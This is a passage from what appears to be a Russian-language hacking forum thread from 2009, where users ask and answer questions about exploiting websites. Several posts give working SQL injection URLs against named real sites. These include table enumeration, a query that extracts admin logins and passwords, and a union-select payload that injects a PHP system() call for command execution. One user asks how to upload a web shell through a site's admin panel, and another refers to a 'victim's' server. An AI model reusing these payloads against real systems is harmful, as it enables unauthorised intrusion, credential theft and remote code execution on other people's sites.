Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    Pashkela
    я не это спрашивал , извините за кривой вопрос.....


    Jokester
    пардон , я только "смотрел" )))))
     
  2. Grookle

    Grookle New Member

    Joined:
    11 Apr 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток всем.
    Подскажите пож. как примерно должен выглядеть запрос ,если ошибка в Mysql выводится при подстановке запятой вот так:
    site.com/bla.php?id='5
    Интересует именно конструкция запроса.
    Заранее благодарен за ответ.
     
  3. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Запрос для чего ? Что нужно узнать то ? Какие данные вытащить ?..

    Я думаю так, товарищ, начинайте не спеша отсюда:
    https://forum.antichat.ru/thread104591.html

    потом плавно переходите сюда:
    https://forum.antichat.ru/threadnav43966-1-10.html

    ну а в идеале не побрезгуйте и этим: (с 1 по 22 включительно)
    http://www.sqlbook.ru/

    удачи
     
    1 person likes this.
  4. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    Привет! Ребята такой вопрос изучаю сервак жервы и нашел /y_key_ec978e5d0cf6ceb1.html в

    что это может бить?
     
  5. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Grookle, сотни раз уже писано-переписано
    Подбор колонок: site.com/bla.php?id=5+order+by+1000/*
    Sql-Inj: site.com/bla.php?id=-999+union+select+1,2,table_name,4,5+from+information_schema.tables/*
     
  6. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Нечетное кол-во апострофов в результирующем запросе - потенциальная sqlinj
     
  7. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.powerhousemuseum.com/designersatwork/how.php?ID=10+or+1=(select+top+1+table_name+from+information_schema.tables)--+

    mssql

    почитай http://forum.antichat.ru/thread30501.html
     
    1 person likes this.
  8. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Смотри внимательно, пишет:

    Conversion failed when converting the nvarchar value 'Designers' to data type int.

    Designers - это и есть табла.

    ЗЫ: И пробел убери в ссылке.
     
    #6888 R1dex, 5 May 2009
    Last edited: 5 May 2009
    2 people like this.
  9. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Как эту расскрутить?
    Code:
    http://www.ncmec.eu/case.php?Id=1
    Тут походу стоит ограничение на кол-во символов?!
     
  10. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    2mailbrush
    Да, там действительно ограничение количества символов в урле:
    Code:
    http://www.ncmec.eu/case.php?Id=1*1*1*1*1*1*1*1*1*1*1--+
    Query failed: SELECT * FROM caseTbl WHERE ID=1*1*;

    Code:
    http://www.ncmec.eu/case.php?Id=1+order+by+1--+
    Query failed: SELECT * FROM caseTbl WHERE ID=1 or;

    ограничение на 3 символа после Id=

    На счёт обхода не скажу ничего, ибо не видел ни разу статтей на подобную тему, но по сути ограничение прописывается в настройках сервера...
     
    #6890 -m0rgan-, 5 May 2009
    Last edited: 5 May 2009
  11. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    -m0rgan-, почисти ПМ. Насчет поста http://forum.antichat.ru/showpost.php?p=1259709&postcount=9197 - скорее всего, ты тупишь. Смотри, выбраная БД - b35015_catalo, а для cizar_admin
    Code:
    http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,table_schema,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/information_schema.tables/**/where/**/table_name=0x63697a61725f61646d696e
    b35015_a. Таким образом
    Code:
    http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,concat_ws(0x3a,id,login,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/b35015_a.cizar_admin
     
    1 person likes this.
  12. cr0w

    cr0w Elder - Старейшина

    Joined:
    11 Sep 2008
    Messages:
    92
    Likes Received:
    141
    Reputations:
    33
    Не не, тут явно в самом скрипте данные отрезаются, например, субстрингом: substr($_GET['Id'], 0, 4); . Инъекцию провести наврядли выйдет. (;
     
  13. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Да, я реально ступил, я почему то забыл про database() :(
     
    1 person likes this.
  14. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Да, скорее всего ты прав, ибо ограничение стиит только на параметры, а длинна ссыли может быть большой...
    Но здесь факт в том, что хз как такое ограничение обойти :(
     
    1 person likes this.
  15. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Не хз как, а никак =)
     
  16. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Вот появился вопросик...
    Что есть RFI SQL INJECTION и где можно почитать о её применении?
    Спасибо!
     
  17. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    -m0rgan-, не слышал о RFI SQL INJECTION, мб просто RFI? RFI/LFI - Remote File Include / Local File Inlude. Почитать:

    http://forum.antichat.ru/thread12123.html
    http://forum.antichat.ru/thread23501.html
    http://forum.antichat.ru/thread91807.html
    http://forum.antichat.ru/thread98525.html
    http://forum.antichat.ru/thread49775.html
     
  18. cr0w

    cr0w Elder - Старейшина

    Joined:
    11 Sep 2008
    Messages:
    92
    Likes Received:
    141
    Reputations:
    33
    -m0rgan-

    Возможно, ты имеешь в виду те случаи, когда из SQL-запроса возвращается имя файла, который затем инклудится, т.е. RFI (или LFI) проводится через SQL-инъекцию, типа:
    Code:
    http://www.site.com/index.php?id=-1+union+select+1,2,[RFI],4,5
    ?

    Встречается иногда и PHP-injection (точнее, Code Execution, так как не только с php такое возможно) через SQL-injection , когда SQL-запрос возвращает код, который затем выполняется скриптом, тогда эксплуатация выглядит примерно так:
    Code:
    http://www.site.com/index.php?id=-1+union+select+1,2,'<?php system($_GET[a]); ?>',4,5&a=ls
     
    #6898 cr0w, 5 May 2009
    Last edited: 5 May 2009
  19. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    приятного времени суток.

    Возник вопрос по поводу dx shell.

    хочу загрузить его на сайт ,через админку. но могу это сделать тока в формате : gif, jpg, png, htm, html, pdf, zip, swf, mp3, flv, doc, docx, xls, xlsx, rtf


    И почему то он у меня открывается в виде кода .

    подскажите ,kak правильно залить шелл и запустить
     
  20. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    Не кидайте сильно в меня какашками так как я новичек ) подскажите что можно к примеру здесь сделать
    только надо заменить на password='1' вроде чет показывает но все равно ниче интересного :)
     
Thread Status:
Not open for further replies.